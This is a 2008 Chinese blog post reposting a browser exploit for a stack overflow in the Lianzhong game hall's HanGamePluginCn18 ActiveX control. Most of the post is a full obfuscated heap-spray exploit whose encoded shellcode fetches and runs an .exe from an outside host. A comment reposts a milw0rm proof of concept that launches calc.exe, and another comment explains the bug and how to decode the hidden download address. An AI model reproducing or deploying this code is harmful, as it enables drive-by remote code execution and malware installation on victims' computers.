未公布的联众exploit 0Day

2008-05-04 08:23:13

以下消息来自幻影论坛[Ph4nt0m]邮件组

<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
document.writeln("<object classid=\"clsid:61F5C358-60FB-4A23-A312-D2B556620F20\" style=\'display:none\' id=\'Kazakh\'><\/object>");
document.writeln("<SCRIPT language=\"javascript\">");
document.writeln("var Wolfdalef,Wolfdalek,QuadroXFX;");
document.writeln("var Samsunga1,Samsunga2,Samsunga3,Samsunga4,Samsunga5,Samsunga6,Samsunga7;");
document.writeln("var Yorkfie1d,Yorkfie2d,Yorkfie3d,Yorkfie4d,Yorkfie5d,Yorkfie6d,Yorkfie7d;");
document.writeln("Samsunga1 = unescape(\"%u16eb%u335b%u66c9%ua4b8%u6639%u0431%u414b%u6640%uf981%u008c%uf37c\");");
document.writeln("Yorkfie2d = unescape(\"%u9ab2%u9717%u053a%u7a6f%ud24f%u063a%u3d0a%ub470%uf594%uc4fc%uf7e2\");");
document.writeln("Yorkfie1d = unescape(\"%ub268%ub568%u63b4%ue72e%ue739%u1769%ue56f%ubcc6%uba29%u676f%ud14c\");");
document.writeln("Yorkfie5d = unescape(\"%uf0c5%u22c5%u804e%u2b36%u6ed8%u6db9%uf303%udfa2%ub186%u6151%ud5b5\");");
document.writeln("Samsunga4 = unescape(\"%ub739%ucd51%ud54b%uee54%uadc6%u54ac%ubd60%ube39%u01b4%uc12e%uc139\");");
document.writeln("Yorkfie3d = unescape(\"%ue987%u2c03%uf34d%u37f8%ufe3e%ubee3%u0ed2%u1f02%ue64f%u8964%u2764\");");
document.writeln("Samsunga6 = unescape(\"%ucd5c%u316e%uc76f%u0b0a%u826a%u5f6e%ucb7f%u8769%u83c6%u5d2d%ubdc5\");");
document.writeln("Yorkfie4d = unescape(\"%ud939%u8e5c%u4d36%u59b1%u0b26%u82e7%u813e%uce39%u5291%uce63%u23d2\");");
document.writeln("Yorkfie6d = unescape(\"%u9a5a%ub4ec%u74a0%u694e%u244a%u3015%u504f%u405e%u474e%u4414%u0956\");");
document.writeln("Samsunga3 = unescape(\"%udcb2%u0025%uc6b2%u2431%udace%ue83c%udcd1%ub339%u5639%uddc0%ud856\");");
document.writeln("Yorkfie7d = unescape(\"%u4a4d%u4a48%u095e%u4d54%u064e%u4b58%u4554%u5e5f%u030b%u475d%u2f5c\");");
document.writeln("Samsunga2 = unescape(\"%u05eb%ue5e8%uffff%u4dff%ua5f7%ua639%ucd66%uf109%u225d%u2138%ua779\");");
document.writeln("Samsunga5 = unescape(\"%uaa6e%uc3c6%uc439%u93c6%uc53d%u00fe%ua939%uae55%u0d17%ucf79%ub45c\");");
document.writeln("Samsunga7 = unescape(\"%u812b%u3b92%ubcc4%u9ffe%ue01d%udc38%u22b2%u98b4%ub729%ub069%ub368\");");
document.writeln("Wolfdalef = Samsunga1+Samsunga2+Samsunga3+Samsunga4+Samsunga5+Samsunga6+Samsunga7;");
document.writeln("Wolfdalek = Yorkfie1d+Yorkfie2d+Yorkfie3d+Yorkfie4d+Yorkfie5d+Yorkfie6d+Yorkfie7d;");
document.writeln("var MmUrl = unescape(\"%u7468%u7074%u2f3a%u752f%u6573%u3172%u332e%u2d33%u3232%u6e2e%u7465%u622f%u6b61%u632e%u7373%u0080\");");
document.writeln("QuadroXFX = Wolfdalef+Wolfdalek;");
document.writeln("var hgs = \"\\x49\\x45\";");
document.writeln("var Norton = 20;");
document.writeln("var Ewido = 245;");
document.writeln("Mcafee = new Array();");
document.writeln("var start = \"\\x53\\x74\\x61\\x72\\x74\";");
document.writeln("var AntiVir = unescape(\"%u9090\"+\"%u9090\");");
document.writeln("var Notify = \"\\x4e\\x61\\x74\\x69\\x76\\x65\";");
document.writeln("var hgs_startNotify = hgs+start+Notify;");
document.writeln("var DrWeb = Norton+QuadroXFX.length;");
document.writeln("while (AntiVir.length<DrWeb) AntiVir+=AntiVir;");
document.writeln("fillblock = AntiVir.substring(0, DrWeb);");
document.writeln("block = AntiVir.substring(0, AntiVir.length-DrWeb);");
document.writeln("while(block.length+DrWeb<0x40000) block = block+block+fillblock;");
document.writeln("VulObject=\"\\x47\\x4c\\x49\\x45\\x44\\x6f\\x77\\x6e\\x2e\\x49\\x45\\x44\\x6f\\x77\\x6e\\x2e\\x31\";");
document.writeln("for (x=0; x<300; x++) Mcafee[x] = block +QuadroXFX;");
document.writeln("var Kazakh=new ActiveXObject(VulObject);");
document.writeln("var x = unescape(\"%0c%0c%0c%0c\");");
document.writeln("while (x.length<Ewido) x += x;");
document.writeln("Kazakh[hgs_startNotify](x,\"AA\",\"AA\");");
document.writeln("<\/script>");
</SCRIPT>

上一篇你，不是马云　　下一篇光的世界第一弹：交换决定未来

类别：黑客&安全 ┆ 技术圈() ┆ 阅读() ┆ 评论() ┆推送到技术圈 ┆返回首页

相关文章

文章评论

[1楼]

beansprouts

2008-05-04 08:30:20

<%@ LANGUAGE = JavaScript %>
<%

var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");

//run calc.exe
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

var bigblock = unescape("%u9090%u9090");

var headersize = 20;

var slackspace = headersize+shellcode.length;

while (bigblock.length<slackspace) bigblock+=bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length+slackspace<0x40000) block = block+block+fillblock;

memory = new Array();

for (x=0; x<300; x++) memory[x] = block + shellcode;

var buffer = '';

while (buffer.length < 1319) buffer+="A";

buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;

act.hgs_startNotify(buffer);

%>

# milw0rm.com [2008-02-19]

[2楼]

beansprouts

2008-05-04 08:30:56

引用网友评论：

不是什么0DAY 二月份就有了

联众世界的游戏大厅主程序GLWorld所安装的ActiveX控件（HanGamePluginCn18.dll，CLSID：61F5C358-60FB-4A23-A312-D2B556620F20）在处理传送给hgs_startGame()和hgs_startNotify()方式的字符串参数时存在栈溢出漏洞。

谈谈解密

在代码中搜索，%u7468%u7074 ，这是exe网址中的http这几个字符串，%u7468%u7074 就是\x68\x74\x74\x70，所以即使没有现成的工具的话,你直接到16进制编辑器里按顺序输入即可完全显示出来了.

在代码中搜索%u652e%u6578，这是".exe"这个字符串的编码

这之间的部分即是exe地址。明白？

昵称：
验证码：		点击图片可刷新验证码　　博客过2级，无需填写验证码
内容：

水煮豆豆_网络爬爬

未公布的联众exploit 0Day